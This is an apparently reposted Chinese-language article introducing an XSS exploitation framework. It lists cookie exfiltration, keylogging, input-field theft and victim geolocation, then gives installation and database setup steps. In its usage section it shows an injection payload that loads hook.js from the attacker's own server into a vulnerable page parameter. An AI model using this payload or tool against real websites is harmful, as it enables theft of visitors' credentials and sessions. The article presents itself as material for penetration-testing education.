工具简介
XSS Exploitation Tool是一款渗透测试工具,专注于跨站脚本漏洞的利用。
该工具仅用于教育目的,请勿在真实环境中使用它!
工具功能:
有关受害浏览器的技术数据
受害者的地理位置
被吸引/访问过的页面的快照
被钩住/访问的页面的源代码
窃取输入字段数据
渗出cookie
键盘记录
显示警告框
重定向用户
工具安装
在 Debian 11 上测试,您可能需要 Apache、Mysql 数据库和 PHP 模块:
$ sudo apt-get
install
apache2
default
-mysql-
server
php php-mysql php-curl php-dom
$ sudo rm /
var
/www/index.html
安装 Git 并提取 XSS-Exploitation-Tool 源代码:
$ sudo apt-get install git
$ cd /tmp
$ git clone
https:
/
/github.com/
Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/*
/var/www
/html/
安装 Composer,然后安装应用程序依赖项:
sudo apt-get install composer
cd
/var/www/html/
sudo chown -R
$your_debian_user
:
$your_debian_user
/var/www/
composer install
sudo chown -R www-data:
$www
-data /var/www/
初始化数据库
sudo mysql
MariaDB
[(
none
)]> grant all
on
*.* to xet
@localhost
identified by
'xet'
;
Query
OK,
0
rows affected (
0
.
00
sec)
MariaDB [(
none
)]> flush privileges;
Query
OK,
0
rows affected (
0
.
00
sec)
MariaDB [(
none
)]> quit
Bye
访问页面 http://server-ip/reset_database.php
修改javascript钩子文件
hook.js 是一个钩子文件 ,您需要将第一行的ip地址替换为XSS利用工具服务器的ip地址:
var
address =
"your server ip"
;
工具使用
首先,创建一个页面(或利用跨站脚本漏洞)来插入 Javascript 挂钩文件(请参阅根目录下的exploit.html):
?vulnerable_param=
<
script
src
=
"http://your_server_ip/hook.js"
/>
获取工具
https:
/
/github.com/
Sharpforce/XSS-Exploitation-Tool.git
原文始发于微信公众号(白帽学子):专注XSS跨站脚本漏洞利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论